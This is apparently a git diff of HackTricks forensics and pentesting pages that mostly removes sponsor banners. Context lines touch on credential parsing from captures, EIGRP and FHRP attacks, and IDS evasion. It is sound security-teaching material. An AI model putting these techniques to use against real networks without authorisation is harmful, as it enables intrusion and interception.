- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md index f6a63c08f..9b84eae0a 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md @@ -4,11 +4,7 @@ ​ -
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} If you need a tool that automates memory analysis with different scan levels and runs multiple Volatility3 plugins in parallel, you can use autoVolatility3:: [https://github.com/H3xKatana/autoVolatility3/](https://github.com/H3xKatana/autoVolatility3/) ```bash @@ -191,14 +187,6 @@ The memory dump of a process will **extract everything** of the current status o volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/ ``` -​ - -
- -​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Processes ### List processes @@ -468,11 +456,6 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist ​ -
- -​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} ## Services @@ -933,10 +916,6 @@ The **Master Boot Record (MBR)** plays a crucial role in managing the logical pa - [https://www.aldeid.com/wiki/Windows-userassist-keys](https://www.aldeid.com/wiki/Windows-userassist-keys) ​\* [https://learn.microsoft.com/en-us/windows/win32/fileio/master-file-table](https://learn.microsoft.com/en-us/windows/win32/fileio/master-file-table) - [https://answers.microsoft.com/en-us/windows/forum/all/uefi-based-pc-protective-mbr-what-is-it/0fc7b558-d8d4-4a7d-bae2-395455bb19aa](https://answers.microsoft.com/en-us/windows/forum/all/uefi-based-pc-protective-mbr-what-is-it/0fc7b558-d8d4-4a7d-bae2-395455bb19aa) -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md index 9ac27c92e..34968e985 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -234,3 +234,5 @@ You may notice that even performing that action there might be **other parts whe - **iHackLabs Certified Digital Forensics Windows** {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index 1920c497a..610d78b88 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -93,3 +93,5 @@ You can use [**viu** ](https://github.com/atanunq/viu)to see images from the ter You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md index c16bee711..62bae2154 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md @@ -2,12 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - > [!NOTE] > A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. @@ -106,12 +100,6 @@ Using common carving techniques can be useful to extract files and information f You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Check Exploits/Malware ### Suricata @@ -242,10 +230,6 @@ usb-keystrokes.md ​ -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md index aba634f34..9e07b899a 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -35,3 +35,5 @@ python3 dnscat_decoder.py sample.pcap bad_domain ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md index 4be42c696..eca3cbd80 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md @@ -232,3 +232,5 @@ drop tcp any any -> any 8000 (msg:"8000 port"; sid:1000;) ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 782e405aa..aa04adeb4 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -19,3 +19,5 @@ You can read more information and find some scripts about how to analyse this in - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index f1371d5fa..00d0b9d65 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -41,3 +41,5 @@ Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit ![](<../../../images/image (499).png>) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 6565bd680..58d29a3e7 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -155,3 +155,5 @@ f.close() ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index ec397e99a..be52ee567 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md @@ -2,11 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} ## From Compiled Binary to .pyc @@ -223,10 +218,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py - [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/) -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 76fa3ef23..b3cf47a1b 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -39,3 +39,5 @@ zips-tricks.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index 104a7530f..9eb0afb2e 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -2,14 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %} - ## Browsers Artifacts Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types. @@ -169,12 +161,7 @@ These paths and commands are crucial for accessing and understanding the browsin - [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) - **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index c22a6f566..4a514defb 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -48,3 +48,5 @@ End Function ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md index f64869c3c..492d9c0c0 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md @@ -2,13 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %} ## OneDrive @@ -103,12 +96,6 @@ Other tables inside this database contain more interesting information: - **deleted_fields**: Dropbox deleted files - **date_added** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 2e07c739d..0304cb9c0 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -2,13 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %} For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary: @@ -25,12 +18,6 @@ sudo pip3 install -U oletools olevba -c /path/to/document #Extract macros ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md index 769407b3a..b32d72ddf 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md @@ -2,14 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pdf-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pdf-file-analysis" %} - **For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/) The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami. @@ -26,3 +18,5 @@ For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://gith For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 6108df028..d577ba693 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -7,3 +7,5 @@ For checking PNG file integrity and repairing corruption, **pngcheck** is a cruc These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 3d2103987..67acc6386 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -15,3 +15,5 @@ This array of tools underscores the versatility required in CTF challenges, wher - [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index d4e17eb0d..cf87f9a6c 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -19,3 +19,5 @@ It's crucial to note that password-protected zip files **do not encrypt filename - [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md index bf7543e9b..dd8a4bd31 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md @@ -502,3 +502,5 @@ EventID 6005 indicates system startup, while EventID 6006 marks shutdown. Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 840b910bc..c508fab70 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -99,3 +99,5 @@ This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/README.md b/src/generic-methodologies-and-resources/external-recon-methodology/README.md index ef4a9559e..21179e3d8 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -2,11 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} ## Assets discoveries @@ -204,10 +199,7 @@ Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover. If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ &#xNAN;_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} ## Subdomains @@ -716,10 +708,7 @@ There are several tools out there that will perform part of the proposed actions - All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md index 53e1f35e6..3aeaccac3 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md @@ -2,10 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits. @@ -312,3 +309,5 @@ AWS SECRET ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index 55186e1f3..c3b284015 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -16,3 +16,5 @@ This helps in several occasions to **search for leaked information** or for **vu > When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-methodology.md b/src/generic-methodologies-and-resources/pentesting-methodology.md index ea6b7f6a7..77009d7b7 100644 --- a/src/generic-methodologies-and-resources/pentesting-methodology.md +++ b/src/generic-methodologies-and-resources/pentesting-methodology.md @@ -2,11 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} ## Pentesting Methodology @@ -137,10 +132,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve - [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md) - [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md) -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md index 1f4bb741f..060eca9a0 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/README.md +++ b/src/generic-methodologies-and-resources/pentesting-network/README.md @@ -2,10 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} ## Discovering hosts from the outside @@ -900,9 +897,8 @@ Bettercap broadcast WSD packets searching for services (UDP Port 3702). - **Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood** - [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index 9dcab7fc1..13d3cbfec 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -38,3 +38,5 @@ A comparative view of DHCPv6 and DHCPv4 message types is presented in the table - [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index fe4b7247a..695ad6a55 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -59,3 +59,5 @@ - `--src`: Sets the attacker’s IP address. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index 77e1a445e..c510db636 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -2,9 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ## FHRP Hijacking Overview @@ -139,8 +136,7 @@ Executing these steps places the attacker in a position to intercept and manipul - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index fd94988fa..cea4a3541 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,10 +1,5 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} # **TTL Manipulation** @@ -48,10 +43,7 @@ Or maybe, 2 packets with the same offset comes and the host has to decide which - [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) -
